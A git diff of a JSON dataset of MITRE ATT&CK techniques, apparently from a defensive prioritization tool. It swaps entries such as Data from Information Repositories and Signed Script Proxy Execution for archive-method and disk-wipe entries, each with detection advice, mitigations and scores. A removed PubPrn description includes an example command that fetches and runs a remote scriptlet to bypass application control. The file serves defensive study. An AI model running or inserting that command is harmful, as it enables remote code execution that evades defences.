+        "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.\n\nSome archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.",
+        "url": "https://attack.mitre.org/techniques/T1560/002",
+        "tactics": [
+            "Collection"
+        ],
+        "detection": "Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "File: File Creation",
+            "Script: Script Execution"
         ],
+        "is_subtechnique": true,
+        "supertechnique": "T1560",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.1,
+        "adjusted_score": 0.1,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
         "process_coverage": true,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.35714285714285715,
-            "mitigation_score": 0.5818181818181818,
-            "detection_score": 0.11
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1213",
-        "name": "Data from Information Repositories",
-        "description": "Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization. \n\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n\nInformation stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.",
-        "url": "https://attack.mitre.org/techniques/T1213",
+        "tid": "T1560.003",
+        "name": "Archive Collected Data: Archive via Custom Method",
+        "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)",
+        "url": "https://attack.mitre.org/techniques/T1560/003",
         "tactics": [
             "Collection"
         ],
-        "detection": "As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\n\nThe user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) Sharepoint audit logging can also be configured to report when a user shares a resource. (Citation: Sharepoint Sharing Events) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities. ",
+        "detection": "Custom archival methods can be very difficult to detect, since many of them use standard programming language concepts, such as bitwise operations.",
         "platforms": [
-            "Google Workspace",
-            "IaaS",
             "Linux",
-            "Office 365",
-            "SaaS",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Application Log: Application Log Content",
-            "Logon Session: Logon Session Creation"
+            "File: File Creation",
+            "Script: Script Execution"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1560",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.10952380952380952,
+        "adjusted_score": 0.10952380952380952,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1561",
+        "name": "Disk Wipe",
+        "description": "Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)",
+        "url": "https://attack.mitre.org/techniques/T1561",
+        "tactics": [
+            "Impact"
+        ],
+        "detection": "Look for attempts to read/write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Drive: Drive Access",
+            "Drive: Drive Modification",
+            "Driver: Driver Load",
+            "Process: Process Creation"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1213.001",
-                "name": "Data from Information Repositories: Confluence",
-                "url": "https://attack.mitre.org/techniques/T1213/001",
-                "description": "\nAdversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n",
-                "detection": "Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\n\nUser access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.",
-                "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    },
-                    {
-                        "mid": "M1017",
-                        "name": "User Training",
-                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                        "url": "https://attack.mitre.org/mitigations/M1017"
-                    }
-                ]
-            },
-            {
-                "tid": "T1213.002",
-                "name": "Data from Information Repositories: Sharepoint",
-                "url": "https://attack.mitre.org/techniques/T1213/002",
-                "description": "Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n",
-                "detection": "The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n",
+                "tid": "T1561.001",
+                "name": "Disk Wipe: Disk Content Wipe",
+                "url": "https://attack.mitre.org/techniques/T1561/001",
+                "description": "Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)",
+                "detection": "Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.",
                 "mitigations": [
                     {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    },
-                    {
-                        "mid": "M1017",
-                        "name": "User Training",
-                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                        "url": "https://attack.mitre.org/mitigations/M1017"
+                        "mid": "M1053",
+                        "name": "Data Backup",
+                        "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
+                        "url": "https://attack.mitre.org/mitigations/M1053"
                     }
                 ]
             },
             {
-                "tid": "T1213.003",
-                "name": "Data from Information Repositories: Code Repositories",
-                "url": "https://attack.mitre.org/techniques/T1213/003",
-                "description": "Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.\n\n\nOnce adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)",
-                "detection": "Monitor access to code repositories, especially performed by privileged users such as Active Directory Domain or Enterprise Administrators as these types of accounts should generally not be used to access code repositories. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user-based anomalies.",
+                "tid": "T1561.002",
+                "name": "Disk Wipe: Disk Structure Wipe",
+                "url": "https://attack.mitre.org/techniques/T1561/002",
+                "description": "Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. \n\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.\n\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)",
+                "detection": "Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.",
                 "mitigations": [
                     {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    },
-                    {
-                        "mid": "M1017",
-                        "name": "User Training",
-                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                        "url": "https://attack.mitre.org/mitigations/M1017"
+                        "mid": "M1053",
+                        "name": "Data Backup",
+                        "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
+                        "url": "https://attack.mitre.org/mitigations/M1053"
                     }
                 ]
             }
         ],
         "mitigations": [
             {
-                "mid": "M1047",
-                "name": "Audit",
-                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                "url": "https://attack.mitre.org/mitigations/M1047"
-            },
-            {
-                "mid": "M1018",
-                "name": "User Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1018"
-            },
-            {
-                "mid": "M1017",
-                "name": "User Training",
-                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                "url": "https://attack.mitre.org/mitigations/M1017"
+                "mid": "M1053",
+                "name": "Data Backup",
+                "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
+                "url": "https://attack.mitre.org/mitigations/M1053"
             }
         ],
-        "cumulative_score": 0.47619047619047616,
-        "adjusted_score": 0.47619047619047616,
+        "cumulative_score": 0.22942312761904762,
+        "adjusted_score": 0.22942312761904762,
         "has_car": false,
-        "has_sigma": false,
+        "has_sigma": true,
         "has_es_siem": false,
-        "has_splunk": true,
+        "has_splunk": false,
         "cis_controls": [
-            "3.1",
-            "3.2",
-            "3.3",
-            "4.7",
-            "5.3",
-            "6.1",
-            "6.2",
-            "6.8",
-            "14.1",
-            "14.4",
-            "14.5",
-            "16.1",
-            "16.9",
-            "18.3",
-            "18.5"
+            "11.1",
+            "11.2",
+            "11.3",
+            "11.4",
+            "11.5"
         ],
         "nist_controls": [
-            "AC-16",
-            "AC-17",
-            "AC-2",
-            "AC-21",
-            "AC-23",
             "AC-3",
-            "AC-4",
-            "AC-5",
             "AC-6",
-            "CA-7",
-            "CA-8",
             "CM-2",
-            "CM-3",
-            "CM-5",
-            "CM-6",
-            "CM-7",
-            "CM-8",
-            "IA-2",
-            "IA-4",
-            "IA-8",
-            "RA-5",
-            "SC-28",
+            "CP-10",
+            "CP-2",
+            "CP-7",
+            "CP-9",
+            "SI-3",
             "SI-4",
             "SI-7"
         ],
-        "process_coverage": false,
+        "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": true,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
+        "hardware_coverage": true,
         "actionability_score": {
-            "combined_score": 0.3761904761904762,
-            "mitigation_score": 0.7090909090909091,
+            "combined_score": 0.14761904761904762,
+            "mitigation_score": 0.2727272727272727,
             "detection_score": 0.01
         },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "choke_point_score": 0.05,
+        "prevalence_score": 0.03180408
     },
     {
-        "tid": "T1216",
-        "name": "Signed Script Proxy Execution",
-        "description": "Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)",
-        "url": "https://attack.mitre.org/techniques/T1216",
+        "tid": "T1561.001",
+        "name": "Disk Wipe: Disk Content Wipe",
+        "description": "Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)",
+        "url": "https://attack.mitre.org/techniques/T1561/001",
         "tactics": [
-            "Defense Evasion"
+            "Impact"
         ],
-        "detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.",
+        "detection": "Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.",
         "platforms": [
-            "Windows"
+            "Linux",
+            "Windows",
+            "macOS"
         ],
         "data_sources": [
             "Command: Command Execution",
-            "Process: Process Creation",
-            "Script: Script Execution"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1216.001",
-                "name": "Signed Script Proxy Execution: PubPrn",
-                "url": "https://attack.mitre.org/techniques/T1216/001",
-                "description": "Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)\n\nAdversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.\n\nIn later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).",
-                "detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.",
-                "mitigations": [
-                    {
-                        "mid": "M1040",
-                        "name": "Behavior Prevention on Endpoint",
-                        "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                        "url": "https://attack.mitre.org/mitigations/M1040"
-                    },
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    }
-                ]
-            }
+            "Drive: Drive Access",
+            "Drive: Drive Modification",
+            "Driver: Driver Load",
+            "Process: Process Creation"
         ],
+        "is_subtechnique": true,
+        "supertechnique": "T1561",
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1038",
-                "name": "Execution Prevention",
-                "description": "Block execution of code on a system through application control, and/or script blocking.",
-                "url": "https://attack.mitre.org/mitigations/M1038"
+                "mid": "M1053",
+                "name": "Data Backup",
+                "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
+                "url": "https://attack.mitre.org/mitigations/M1053"
             }
         ],
-        "cumulative_score": 0.25842263238095237,
-        "adjusted_score": 0.25842263238095237,
+        "cumulative_score": 0.20714285714285713,
+        "adjusted_score": 0.20714285714285713,
         "has_car": false,
         "has_sigma": true,
         "has_es_siem": false,
         "has_splunk": true,
         "cis_controls": [
-            "2.7"
+            "11.1",
+            "11.2",
+            "11.3",
+            "11.4",
+            "11.5"
         ],
         "nist_controls": [
+            "AC-3",
+            "AC-6",
             "CM-2",
-            "CM-6",
-            "CM-7",
-            "SI-10",
+            "CP-10",
+            "CP-2",
+            "CP-7",
+            "CP-9",
+            "SI-3",
             "SI-4",
             "SI-7"
         ],
@@ -9849,24 +32732,17 @@
         "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.15238095238095237,
-            "mitigation_score": 0.12727272727272726,
-            "detection_score": 0.18
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.00604168
+        "hardware_coverage": true
     },
     {
-        "tid": "T1217",
-        "name": "Browser Bookmark Discovery",
-        "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.\n\nBrowser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.\n\nSpecific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.",
-        "url": "https://attack.mitre.org/techniques/T1217",
+        "tid": "T1561.002",
+        "name": "Disk Wipe: Disk Structure Wipe",
+        "description": "Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. \n\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.\n\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)",
+        "url": "https://attack.mitre.org/techniques/T1561/002",
         "tactics": [
-            "Discovery"
+            "Impact"
         ],
-        "detection": "Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.",
+        "detection": "Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the \\\\\\\\.\\\\ notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.",
         "platforms": [
             "Linux",
             "Windows",
@@ -9874,372 +32750,331 @@
         ],
         "data_sources": [
             "Command: Command Execution",
-            "File: File Access",
+            "Drive: Drive Access",
+            "Drive: Drive Modification",
+            "Driver: Driver Load",
             "Process: Process Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1561",
         "subtechniques": [],
-        "mitigations": [],
-        "cumulative_score": 0.1142857142857143,
-        "adjusted_score": 0.1142857142857143,
+        "mitigations": [
+            {
+                "mid": "M1053",
+                "name": "Data Backup",
+                "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
+                "url": "https://attack.mitre.org/mitigations/M1053"
+            }
+        ],
+        "cumulative_score": 0.6690476190476191,
+        "adjusted_score": 0.6690476190476191,
         "has_car": false,
         "has_sigma": true,
-        "has_es_siem": false,
-        "has_splunk": false,
-        "cis_controls": [],
-        "nist_controls": [],
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "11.1",
+            "11.2",
+            "11.3",
+            "11.4",
+            "11.5"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-6",
+            "CM-2",
+            "CP-10",
+            "CP-2",
+            "CP-7",
+            "CP-9",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
         "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": true,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.014285714285714284,
-            "detection_score": 0.03
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "hardware_coverage": true
     },
     {
-        "tid": "T1218",
-        "name": "Signed Binary Proxy Execution",
-        "description": "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.",
-        "url": "https://attack.mitre.org/techniques/T1218",
+        "tid": "T1562",
+        "name": "Impair Defenses",
+        "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.\n\nAdversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.",
+        "url": "https://attack.mitre.org/techniques/T1562",
         "tactics": [
             "Defense Evasion"
         ],
-        "detection": "Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.\n\nMonitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.",
+        "detection": "Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious.\n\nMonitor environment variables and APIs that can be leveraged to disable security measures.",
         "platforms": [
-            "Windows"
+            "Containers",
